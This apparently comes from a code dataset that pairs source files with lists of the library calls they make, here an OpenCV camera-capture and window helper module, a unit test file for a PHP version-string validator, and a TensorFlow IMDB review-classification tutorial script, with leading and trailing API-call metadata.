"xarray.merge",
"os.path.split",
"os.mkdir",
"numpy.round",
"numpy.ceil",
"os.path.splitext",
"os.path.dirname",
"xarray.open_dataset",
"numpy.unique",
"os.path.join",
"os.getcwd",
"datetime.datetime.now",
"os.path.basename",
"xarray.DataArray"
]
| [((2910, 2929), 'os.path.basename', 'os.path.basename', (['p'], {}), '(p)\n', (2926, 2929), False, 'import os\n'), ((2947, 2967), 'os.path.splitext', 'os.path.splitext', (['pp'], {}), '(pp)\n', (2963, 2967), False, 'import os\n'), ((8945, 8977), 'os.path.join', 'os.path.join', (['save_dir', 'file_out'], {}), '(save_dir, file_out)\n', (8957, 8977), False, 'import os\n'), ((16839, 16865), 'xarray.merge', 'xr.merge', (['[proc_data, ABS]'], {}), '([proc_data, ABS])\n', (16847, 16865), True, 'import xarray as xr\n'), ((16879, 16898), 'xarray.merge', 'xr.merge', (['[pp, TVG]'], {}), '([pp, TVG])\n', (16887, 16898), True, 'import xarray as xr\n'), ((7771, 7803), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (7787, 7803), False, 'import os\n'), ((7838, 7863), 'os.path.splitext', 'os.path.splitext', (['file_in'], {}), '(file_in)\n', (7854, 7863), False, 'import os\n'), ((7973, 8004), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (7988, 8004), False, 'import os\n'), ((8801, 8812), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (8810, 8812), False, 'import os\n'), ((8872, 8896), 'os.path.exists', 'os.path.exists', (['save_dir'], {}), '(save_dir)\n', (8886, 8896), False, 'import os\n'), ((8910, 8928), 'os.mkdir', 'os.mkdir', (['save_dir'], {}), '(save_dir)\n', (8918, 8928), False, 'import os\n'), ((10609, 10637), 'numpy.mod', 'np.mod', (['p_data_sz', 'p_tile_sz'], {}), '(p_data_sz, p_tile_sz)\n', (10615, 10637), True, 'import numpy as np\n'), ((11689, 11712), 'os.path.exists', 'os.path.exists', (['Sv_path'], {}), '(Sv_path)\n', (11703, 11712), False, 'import os\n'), ((16733, 16774), 'numpy.arange', 'np.arange', (["proc_data.Sv['ping_time'].size"], {}), "(proc_data.Sv['ping_time'].size)\n", (16742, 16774), True, 'import numpy as np\n'), ((17741, 17966), 'xarray.DataArray', 'xr.DataArray', (['clean_val'], {'coords': "{'frequency': proc_data['frequency'].values, 'ping_time': tmp_clean[0][\n 'ping_time'].values, 'range_bin': tmp_clean[0]['range_bin'].values}", 'dims': "['frequency', 'ping_time', 'range_bin']"}), "(clean_val, coords={'frequency': proc_data['frequency'].values,\n 'ping_time': tmp_clean[0]['ping_time'].values, 'range_bin': tmp_clean[0\n ]['range_bin'].values}, dims=['frequency', 'ping_time', 'range_bin'])\n", (17753, 17966), True, 'import xarray as xr\n'), ((23685, 23849), 'xarray.DataArray', 'xr.DataArray', (['noise_val'], {'coords': "{'frequency': proc_data['frequency'].values, 'ping_time': tmp_noise[0][\n 'ping_time'].values}", 'dims': "['frequency', 'ping_time']"}), "(noise_val, coords={'frequency': proc_data['frequency'].values,\n 'ping_time': tmp_noise[0]['ping_time'].values}, dims=['frequency',\n 'ping_time'])\n", (23697, 23849), True, 'import xarray as xr\n'), ((3192, 3223), 'xarray.open_dataset', 'xr.open_dataset', (['self.file_path'], {}), '(self.file_path)\n', (3207, 3223), True, 'import xarray as xr\n'), ((8082, 8109), 'os.path.splitext', 'os.path.splitext', (['save_path'], {}), '(save_path)\n', (8098, 8109), False, 'import os\n'), ((8253, 8277), 'os.path.split', 'os.path.split', (['save_path'], {}), '(save_path)\n', (8266, 8277), False, 'import os\n'), ((10335, 10373), 'numpy.round', 'np.round', (['(r_tile_sz / sample_thickness)'], {}), '(r_tile_sz / sample_thickness)\n', (10343, 10373), True, 'import numpy as np\n'), ((10550, 10585), 'numpy.ceil', 'np.ceil', (['(r_data_sz / num_r_per_tile)'], {}), '(r_data_sz / num_r_per_tile)\n', (10557, 10585), True, 'import numpy as np\n'), ((11099, 11127), 
'numpy.arange', 'np.arange', (['(num_tile_ping + 1)'], {}), '(num_tile_ping + 1)\n', (11108, 11127), True, 'import numpy as np\n'), ((11754, 11778), 'xarray.open_dataset', 'xr.open_dataset', (['Sv_path'], {}), '(Sv_path)\n', (11769, 11778), True, 'import xarray as xr\n'), ((28184, 28217), 'numpy.arange', 'np.arange', (["MVBS['range_bin'].size"], {}), "(MVBS['range_bin'].size)\n", (28193, 28217), True, 'import numpy as np\n'), ((3352, 3383), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (3367, 3383), False, 'import os\n'), ((3537, 3568), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (3552, 3568), False, 'import os\n'), ((3728, 3759), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (3743, 3759), False, 'import os\n'), ((3909, 3940), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (3924, 3940), False, 'import os\n'), ((8394, 8425), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (8409, 8425), False, 'import os\n'), ((10761, 10791), 'numpy.ceil', 'np.ceil', (['(p_data_sz / p_tile_sz)'], {}), '(p_data_sz / p_tile_sz)\n', (10768, 10791), True, 'import numpy as np\n'), ((10981, 11004), 'numpy.arange', 'np.arange', (['(x.values + 1)'], {}), '(x.values + 1)\n', (10990, 11004), True, 'import numpy as np\n'), ((28740, 28775), 'numpy.arange', 'np.arange', (["tmp_da['range_bin'].size"], {}), "(tmp_da['range_bin'].size)\n", (28749, 28775), True, 'import numpy as np\n'), ((10672, 10702), 'numpy.ceil', 'np.ceil', (['(p_data_sz / p_tile_sz)'], {}), '(p_data_sz / p_tile_sz)\n', (10679, 10702), True, 'import numpy as np\n'), ((17681, 17715), 'xarray.align', 'xr.align', (['*tmp_clean'], {'join': '"""outer"""'}), "(*tmp_clean, join='outer')\n", (17689, 17715), True, 'import xarray as xr\n'), ((23624, 23658), 'xarray.align', 'xr.align', (['*tmp_noise'], {'join': '"""outer"""'}), "(*tmp_noise, join='outer')\n", (23632, 23658), True, 'import xarray as xr\n'), ((29015, 29048), 'xarray.align', 'xr.align', (['*tmp_MVBS'], {'join': '"""outer"""'}), "(*tmp_MVBS, join='outer')\n", (29023, 29048), True, 'import xarray as xr\n'), ((14963, 14980), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (14978, 14980), True, 'import datetime as dt\n'), ((17000, 17011), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (17008, 17011), True, 'import numpy as np\n'), ((22541, 22552), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (22549, 22552), True, 'import numpy as np\n'), ((26586, 26603), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (26601, 26603), True, 'import datetime as dt\n'), ((27837, 27848), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (27845, 27848), True, 'import numpy as np\n'), ((3442, 3474), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (3458, 3474), False, 'import os\n'), ((3633, 3665), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (3649, 3665), False, 'import os\n'), ((3818, 3850), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (3834, 3850), False, 'import os\n'), ((4001, 4033), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (4017, 4033), False, 'import os\n'), ((15274, 15291), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (15289, 15291), True, 'import datetime as dt\n'), ((19234, 19251), 
'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (19249, 19251), True, 'import datetime as dt\n'), ((27114, 27131), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (27129, 27131), True, 'import datetime as dt\n'), ((29316, 29344), 'numpy.arange', 'np.arange', (['MVBS_val.shape[2]'], {}), '(MVBS_val.shape[2])\n', (29325, 29344), True, 'import numpy as np\n'), ((29926, 29943), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (29941, 29943), True, 'import datetime as dt\n'), ((12203, 12220), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (12218, 12220), True, 'import datetime as dt\n'), ((26948, 26965), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (26963, 26965), True, 'import datetime as dt\n'), ((12066, 12083), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (12081, 12083), True, 'import datetime as dt\n'), ((28029, 28088), 'numpy.unique', 'np.unique', (['(self.MVBS_range_bin_size / self.sample_thickness)'], {}), '(self.MVBS_range_bin_size / self.sample_thickness)\n', (28038, 28088), True, 'import numpy as np\n'), ((22756, 22820), 'numpy.unique', 'np.unique', (['(self.noise_est_range_bin_size / self.sample_thickness)'], {}), '(self.noise_est_range_bin_size / self.sample_thickness)\n', (22765, 22820), True, 'import numpy as np\n')] |
import cv2
import numpy as np
import time
class CaptureManager(object):
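    """Manage frame capture from a cv2 capture object, with optional mirrored preview and FPS estimation."""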
def __init__(self, capture, preview_window_manager=None, should_mirror_preview = False):
self.preview_window_manager = preview_window_manager
self.should_mirror_preview = should_mirror_preview
self._capture = capture
self._channel = 0
self._entered_frame = False
self._frame = None
        self._frames_elapsed = 0
self._fps_est = None
@property
def channel(self):
return self._channel
    @channel.setter
    def channel(self, value):
        self._channel = value
@property
def frame(self):
if self._entered_frame and self._frame is None:
_, self._frame = self._capture.retrieve(channel=self.channel)
return self._frame
def enter_frame(self):
# capture the next frame
assert not self._entered_frame, 'previous enter_frame() had no matching exit_frame()'
if self._capture is not None:
self._entered_frame = self._capture.grab()
def exit_frame(self):
# draw to window, write to files, release the frame
        # check whether any grabbed frame is retrievable; if not, exit early
if self.frame is None:
self._entered_frame = False
return
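        # update the FPS estimate and related variables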
if self._frames_elapsed == 0:
self._start_time = time.time()
else:
time_elapsed = time.time() - self._start_time
self._fps_est = self._frames_elapsed / time_elapsed
self._frames_elapsed += 1
# draw
if self.preview_window_manager is not None:
if self.should_mirror_preview:
mirrored_frame = np.fliplr(self._frame).copy()
self.preview_window_manager.show(mirrored_frame)
else:
self.preview_window_manager.show(self._frame)
# release the frame
self._frame = None
self._entered_frame = False
class WindowManager(object):
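    """Wrap a named OpenCV window and forward keypresses to an optional callback."""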
def __init__(self, window_name, keypress_callback = None):
self.keypress_callback = keypress_callback
self._window_name = window_name
self._is_window_created = False
@property
def is_window_created(self):
return self._is_window_created
def create_window(self):
cv2.namedWindow(self._window_name)
self._is_window_created = True
def show(self, frame):
cv2.imshow(self._window_name, frame)
def destroy_window(self):
cv2.destroyWindow(self._window_name)
self._is_window_created = False
def process_events(self):
        keycode = cv2.waitKey(1)
        if self.keypress_callback is not None and keycode != -1:
            keycode &= 0xFF
            self.keypress_callback(keycode)
| [
"cv2.destroyWindow",
"numpy.fliplr",
"cv2.imshow",
"cv2.waitKey",
"time.time",
"cv2.namedWindow"
]
| [((2291, 2325), 'cv2.namedWindow', 'cv2.namedWindow', (['self._window_name'], {}), '(self._window_name)\n', (2306, 2325), False, 'import cv2\n'), ((2401, 2437), 'cv2.imshow', 'cv2.imshow', (['self._window_name', 'frame'], {}), '(self._window_name, frame)\n', (2411, 2437), False, 'import cv2\n'), ((2477, 2513), 'cv2.destroyWindow', 'cv2.destroyWindow', (['self._window_name'], {}), '(self._window_name)\n', (2494, 2513), False, 'import cv2\n'), ((2603, 2617), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (2614, 2617), False, 'import cv2\n'), ((1346, 1357), 'time.time', 'time.time', ([], {}), '()\n', (1355, 1357), False, 'import time\n'), ((1399, 1410), 'time.time', 'time.time', ([], {}), '()\n', (1408, 1410), False, 'import time\n'), ((1672, 1694), 'numpy.fliplr', 'np.fliplr', (['self._frame'], {}), '(self._frame)\n', (1681, 1694), True, 'import numpy as np\n')] |
from PHPUnitKit.tests import unittest
from PHPUnitKit.plugin import is_valid_php_version_file_version
class TestIsValidPhpVersionFileVersion(unittest.TestCase):
def test_invalid_values(self):
self.assertFalse(is_valid_php_version_file_version(''))
self.assertFalse(is_valid_php_version_file_version(' '))
self.assertFalse(is_valid_php_version_file_version('foobar'))
self.assertFalse(is_valid_php_version_file_version('masterfoo'))
self.assertFalse(is_valid_php_version_file_version('.'))
self.assertFalse(is_valid_php_version_file_version('x'))
self.assertFalse(is_valid_php_version_file_version('x.x'))
self.assertFalse(is_valid_php_version_file_version('x.x.x'))
self.assertFalse(is_valid_php_version_file_version('x'))
self.assertFalse(is_valid_php_version_file_version('snapshot'))
def test_master_branch_version(self):
self.assertTrue(is_valid_php_version_file_version('master'))
def test_specific_semver_versions(self):
self.assertTrue(is_valid_php_version_file_version('5.0.0'))
self.assertTrue(is_valid_php_version_file_version('5.0.1'))
self.assertTrue(is_valid_php_version_file_version('5.0.7'))
self.assertTrue(is_valid_php_version_file_version('5.0.30'))
self.assertTrue(is_valid_php_version_file_version('5.0.32'))
self.assertTrue(is_valid_php_version_file_version('5.1.0'))
self.assertTrue(is_valid_php_version_file_version('5.1.1'))
self.assertTrue(is_valid_php_version_file_version('5.1.3'))
self.assertTrue(is_valid_php_version_file_version('5.1.27'))
self.assertTrue(is_valid_php_version_file_version('7.0.0'))
self.assertTrue(is_valid_php_version_file_version('7.1.19'))
def test_minor_versions(self):
self.assertTrue(is_valid_php_version_file_version('5.6'))
self.assertTrue(is_valid_php_version_file_version('7.1'))
self.assertTrue(is_valid_php_version_file_version('7.2'))
def test_major_dot_x_versions(self):
self.assertTrue(is_valid_php_version_file_version('5.x'))
self.assertTrue(is_valid_php_version_file_version('6.x'))
self.assertTrue(is_valid_php_version_file_version('7.x'))
self.assertTrue(is_valid_php_version_file_version('8.x'))
def test_major_dot_minor_dot_x_versions(self):
self.assertTrue(is_valid_php_version_file_version('7.0.x'))
self.assertTrue(is_valid_php_version_file_version('7.1.x'))
self.assertTrue(is_valid_php_version_file_version('7.2.x'))
def test_snapshot_versions(self):
self.assertTrue(is_valid_php_version_file_version('5.4snapshot'))
self.assertTrue(is_valid_php_version_file_version('5.5snapshot'))
self.assertTrue(is_valid_php_version_file_version('5.6snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.0snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.1snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.0.0snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.1.0snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.1.1snapshot'))
| [
"PHPUnitKit.plugin.is_valid_php_version_file_version"
]
| [((225, 262), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['""""""'], {}), "('')\n", (258, 262), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((289, 327), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['""" """'], {}), "(' ')\n", (322, 327), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((354, 397), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""foobar"""'], {}), "('foobar')\n", (387, 397), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((424, 470), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""masterfoo"""'], {}), "('masterfoo')\n", (457, 470), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((497, 535), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""."""'], {}), "('.')\n", (530, 535), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((562, 600), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""x"""'], {}), "('x')\n", (595, 600), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((627, 667), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""x.x"""'], {}), "('x.x')\n", (660, 667), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((694, 736), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""x.x.x"""'], {}), "('x.x.x')\n", (727, 736), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((763, 801), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""x"""'], {}), "('x')\n", (796, 801), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((828, 873), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""snapshot"""'], {}), "('snapshot')\n", (861, 873), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((942, 985), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""master"""'], {}), "('master')\n", (975, 985), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1057, 1099), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.0.0"""'], {}), "('5.0.0')\n", (1090, 1099), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1125, 1167), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.0.1"""'], {}), "('5.0.1')\n", (1158, 1167), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1193, 1235), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.0.7"""'], {}), "('5.0.7')\n", (1226, 1235), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1261, 1304), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.0.30"""'], {}), "('5.0.30')\n", (1294, 1304), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1330, 1373), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 
'is_valid_php_version_file_version', (['"""5.0.32"""'], {}), "('5.0.32')\n", (1363, 1373), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1399, 1441), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.1.0"""'], {}), "('5.1.0')\n", (1432, 1441), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1467, 1509), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.1.1"""'], {}), "('5.1.1')\n", (1500, 1509), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1535, 1577), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.1.3"""'], {}), "('5.1.3')\n", (1568, 1577), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1603, 1646), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.1.27"""'], {}), "('5.1.27')\n", (1636, 1646), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1672, 1714), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.0.0"""'], {}), "('7.0.0')\n", (1705, 1714), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1740, 1783), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1.19"""'], {}), "('7.1.19')\n", (1773, 1783), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1845, 1885), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.6"""'], {}), "('5.6')\n", (1878, 1885), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1911, 1951), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1"""'], {}), "('7.1')\n", (1944, 1951), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1977, 2017), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.2"""'], {}), "('7.2')\n", (2010, 2017), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2085, 2125), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.x"""'], {}), "('5.x')\n", (2118, 2125), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2151, 2191), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""6.x"""'], {}), "('6.x')\n", (2184, 2191), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2217, 2257), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.x"""'], {}), "('7.x')\n", (2250, 2257), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2283, 2323), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""8.x"""'], {}), "('8.x')\n", (2316, 2323), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2401, 2443), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.0.x"""'], {}), "('7.0.x')\n", (2434, 2443), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2469, 2511), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', 
(['"""7.1.x"""'], {}), "('7.1.x')\n", (2502, 2511), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2537, 2579), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.2.x"""'], {}), "('7.2.x')\n", (2570, 2579), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2644, 2692), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.4snapshot"""'], {}), "('5.4snapshot')\n", (2677, 2692), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2718, 2766), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.5snapshot"""'], {}), "('5.5snapshot')\n", (2751, 2766), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2792, 2840), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.6snapshot"""'], {}), "('5.6snapshot')\n", (2825, 2840), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2866, 2914), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.0snapshot"""'], {}), "('7.0snapshot')\n", (2899, 2914), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2940, 2988), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1snapshot"""'], {}), "('7.1snapshot')\n", (2973, 2988), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((3014, 3064), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.0.0snapshot"""'], {}), "('7.0.0snapshot')\n", (3047, 3064), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((3090, 3140), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1.0snapshot"""'], {}), "('7.1.0snapshot')\n", (3123, 3140), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((3166, 3216), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1.1snapshot"""'], {}), "('7.1.1snapshot')\n", (3199, 3216), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n')] |
#----------------
# 01_02 Text classification
#----------------
# TensorFlow and tf.keras
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
# TensorFlow's version : 1.12.0
print('TensorFlow\'s version : ', tf.__version__)
#----------------
# 1 Download the IMDB dataset
#----------------
imdb = keras.datasets.imdb
(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)
#----------------
# 2 Explore the data
#----------------
# Training entries: 25000, labels: 25000
print("Training entries: {}, labels: {}".format(len(train_data), len(train_labels)))
print(train_data[0])
# (218, 189)
print(len(train_data[0]), len(train_data[1]))
# A dictionary mapping words to an integer index
word_index = imdb.get_word_index()
# The first indices are reserved
word_index = {k:(v+3) for k,v in word_index.items()}
word_index["<PAD>"] = 0
word_index["<START>"] = 1
word_index["<UNK>"] = 2 # unknown
word_index["<UNUSED>"] = 3
reverse_word_index = dict([(value, key) for (key, value) in word_index.items()])
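# Rebuild the human-readable text of a review from its integer encoding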
def decode_review(text):
return ' '.join([reverse_word_index.get(i, '?') for i in text])
decode_review(train_data[0])
#----------------
# 3 Prepare the data
#----------------
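# Pad all reviews to a fixed length of 256 so they can be batched as a single tensor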
train_data = keras.preprocessing.sequence.pad_sequences(train_data,
value=word_index["<PAD>"],
padding='post',
maxlen=256)
test_data = keras.preprocessing.sequence.pad_sequences(test_data,
value=word_index["<PAD>"],
padding='post',
maxlen=256)
# (256, 256)
print((len(train_data[0]), len(train_data[1])))
print(train_data[0])
#----------------
# 4 Build the model
#----------------
# input shape is the vocabulary count used for the movie reviews (10,000 words)
vocab_size = 10000
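# Stack: embedding -> global average pooling -> dense(16, relu) -> dense(1, sigmoid)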
model = keras.Sequential()
model.add(keras.layers.Embedding(vocab_size, 16))
model.add(keras.layers.GlobalAveragePooling1D())
model.add(keras.layers.Dense(16, activation=tf.nn.relu))
model.add(keras.layers.Dense(1, activation=tf.nn.sigmoid))
model.summary()
model.compile(optimizer=tf.train.AdamOptimizer(),
loss='binary_crossentropy',
metrics=['accuracy'])
#----------------
# 5 Create a validation set
#----------------
x_val = train_data[:10000]
partial_x_train = train_data[10000:]
y_val = train_labels[:10000]
partial_y_train = train_labels[10000:]
#----------------
# 6 Train the model
#----------------
history = model.fit(partial_x_train,
partial_y_train,
epochs=40,
batch_size=512,
validation_data=(x_val, y_val),
verbose=1)
#----------------
# 7 Evaluate the model
#----------------
results = model.evaluate(test_data, test_labels)
print(results)
#----------------
# 8 Plot accuracy and loss over time
#----------------
history_dict = history.history
# dict_keys(['loss', 'val_loss', 'val_acc', 'acc'])
print(history_dict.keys())
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
# loss
# "bo" is for "blue dot"
plt.plot(epochs, loss, 'bo', label='Training loss')
# b is for "solid blue line"
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
# acc
plt.clf() # clear figure
acc_values = history_dict['acc']
val_acc_values = history_dict['val_acc']
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
| [
"tensorflow.keras.preprocessing.sequence.pad_sequences",
"tensorflow.keras.Sequential",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.clf",
"tensorflow.keras.layers.Embedding",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.layers.GlobalAveragePooling1D",
"matplotlib.pyplot.title",
"tensorflow.train.AdamOptimizer",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
]
| [((1257, 1371), 'tensorflow.keras.preprocessing.sequence.pad_sequences', 'keras.preprocessing.sequence.pad_sequences', (['train_data'], {'value': "word_index['<PAD>']", 'padding': '"""post"""', 'maxlen': '(256)'}), "(train_data, value=word_index[\n '<PAD>'], padding='post', maxlen=256)\n", (1299, 1371), False, 'from tensorflow import keras\n'), ((1548, 1661), 'tensorflow.keras.preprocessing.sequence.pad_sequences', 'keras.preprocessing.sequence.pad_sequences', (['test_data'], {'value': "word_index['<PAD>']", 'padding': '"""post"""', 'maxlen': '(256)'}), "(test_data, value=word_index[\n '<PAD>'], padding='post', maxlen=256)\n", (1590, 1661), False, 'from tensorflow import keras\n'), ((2061, 2079), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (2077, 2079), False, 'from tensorflow import keras\n'), ((3378, 3429), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'loss', '"""bo"""'], {'label': '"""Training loss"""'}), "(epochs, loss, 'bo', label='Training loss')\n", (3386, 3429), True, 'import matplotlib.pyplot as plt\n'), ((3459, 3515), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_loss', '"""b"""'], {'label': '"""Validation loss"""'}), "(epochs, val_loss, 'b', label='Validation loss')\n", (3467, 3515), True, 'import matplotlib.pyplot as plt\n'), ((3516, 3557), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and validation loss"""'], {}), "('Training and validation loss')\n", (3525, 3557), True, 'import matplotlib.pyplot as plt\n'), ((3558, 3578), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epochs"""'], {}), "('Epochs')\n", (3568, 3578), True, 'import matplotlib.pyplot as plt\n'), ((3579, 3597), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Loss"""'], {}), "('Loss')\n", (3589, 